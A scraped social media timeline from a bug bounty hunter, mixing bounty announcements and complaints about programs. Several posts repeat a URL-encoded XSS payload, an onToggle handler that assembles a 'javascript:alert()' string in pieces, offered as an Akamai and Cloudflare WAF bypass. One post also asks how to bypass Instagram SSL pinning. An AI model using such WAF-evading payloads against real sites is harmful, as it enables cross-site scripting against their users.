bug_vs_me Profile Banner
Deepak bug_vs_me Profile
Deepak bug_vs_me

@bug_vs_me

Followers
12K
Following
11K
Media
386
Statuses
5K

security researcher | Bug Bounty hunter

Bharat ๐Ÿ‡ฎ๐Ÿ‡ณ
Joined March 2020
Don't wanna be here? Send us removal request.
@bug_vs_me
Deepak bug_vs_me
9 months
Yay, I was awarded a $5,000 bounty on @Hacker0x01!. @EpicGames the Best team on H1 #TogetherWeHitHarder.
Tweet card summary image
hackerone.com
๐Ÿง‘โ€๐Ÿ’ป -
19
12
292
@bug_vs_me
Deepak bug_vs_me
11 hours
Great collaboration XSS to P2 esclation.
@fteagleeye1
Muhammad Farhad Ansary ๐Ÿ‡ต๐Ÿ‡ธ ๐Ÿ‡ง๐Ÿ‡ฉ
11 hours
Me & @bug_vs_me earned $$$ for our submission on @bugcrowd . #ItTakesACrowd.
2
0
30
@bug_vs_me
Deepak bug_vs_me
22 hours
@coffinxp7
Coffin
22 hours
If anyone needs help bypassing XSS WAFs, you should definitely reach out to him. heโ€™s really skilled at it. I shared targets like MakeMyTrip and a few other sites with him and he did an amazing job.
3
1
31
@bug_vs_me
Deepak bug_vs_me
22 hours
Tweet media one
@bug_vs_me
Deepak bug_vs_me
2 days
onToggLe='let%20x=%60javascri%60%3Blet%20y=%60pt:aler%60%3Blet%20z=%60t()%60%3Blet%20a=x+y+z%3Blocation=a'>.
5
15
196
@bug_vs_me
Deepak bug_vs_me
2 days
in case some guys say it don't work you have to use it with specific tag and trick WAF regex :) i cant share full payload as they will fix it
Tweet media one
0
0
13
@bug_vs_me
Deepak bug_vs_me
2 days
Akamai + cloudflare bypass if onerror=alert() blocked i mean ofcource its blocked so you can use below payload
Tweet media one
@bug_vs_me
Deepak bug_vs_me
2 days
onToggLe='let%20x=%60javascri%60%3Blet%20y=%60pt:aler%60%3Blet%20z=%60t()%60%3Blet%20a=x+y+z%3Blocation=a'>.
2
17
221
@bug_vs_me
Deepak bug_vs_me
2 days
onToggLe='let%20x=%60javascri%60%3Blet%20y=%60pt:aler%60%3Blet%20z=%60t()%60%3Blet%20a=x+y+z%3Blocation=a'>.
3
7
112
@bug_vs_me
Deepak bug_vs_me
6 days
Hey anyone have good self hosted bug bounty program, please DM me, we will collaborate there.
5
0
9
@bug_vs_me
Deepak bug_vs_me
14 days
Looks like i need to left bug bounty and start new life.
10
1
63
@bug_vs_me
Deepak bug_vs_me
1 month
And i got ban for low quality report ( i don't think so), and contacting team member ๐Ÿ˜ถโ€๐ŸŒซ๏ธ.
@bug_vs_me
Deepak bug_vs_me
2 months
0
0
10
@bug_vs_me
Deepak bug_vs_me
1 month
i blocked this shit ads multiple times still it shows on every YT video, @YouTube i dont wana see this, why can't you block this adv, if user once reported it. :/
Tweet media one
11
0
27
@bug_vs_me
Deepak bug_vs_me
1 month
Anyone know how to bypass Instagram SSL pinning?.
6
0
12
@bug_vs_me
Deepak bug_vs_me
1 month
0xe751bf33164b8786c71d59c48f668d22408e142d.
4
0
19
@bug_vs_me
Deepak bug_vs_me
2 months
I have like $24 in my bank account right now,๐Ÿ˜‚.
15
0
34
@bug_vs_me
Deepak bug_vs_me
2 months
I can be better triager at @Bugcrowd.
3
0
53
@bug_vs_me
Deepak bug_vs_me
2 months
Spent 2 days escalatin' a false positive bugโ€”shit hurts :). But still, learned hella new stuff while tryinโ€™ to escalate that vuln.
2
0
28
@bug_vs_me
Deepak bug_vs_me
2 months
Need help, i am running a application ( using pnpm) locally on my macbook, i want to proxy all application request through burp-suite, for example application sent a request in backends to GitHub API to fetch data, how can i capture and intercept that request?.
3
0
9
@bug_vs_me
Deepak bug_vs_me
2 months
I am writing here because i tried my best to get help from @Hacker0x01 and @GitHubSecurity team non of any responded that's really demotivating, so have to write here to get some help.
0
0
10
@bug_vs_me
Deepak bug_vs_me
2 months
Hi anyone from @GitHubSecurity team here?. 2 months ago me and my friend reported a Stored DOM XSS on GitHub main domain with great chain to make it high severity report, but someone from team came set severity low, rewardes low bounty and closed report without any explanation :(
Tweet media one
8
5
104
@bug_vs_me
Deepak bug_vs_me
2 months
Write-up soon ๐ŸŽ‰.
@akincibor1
akincibor.base.eth
2 months
good colab with @bug_vs_me he is really good bypassing waf!.
5
0
24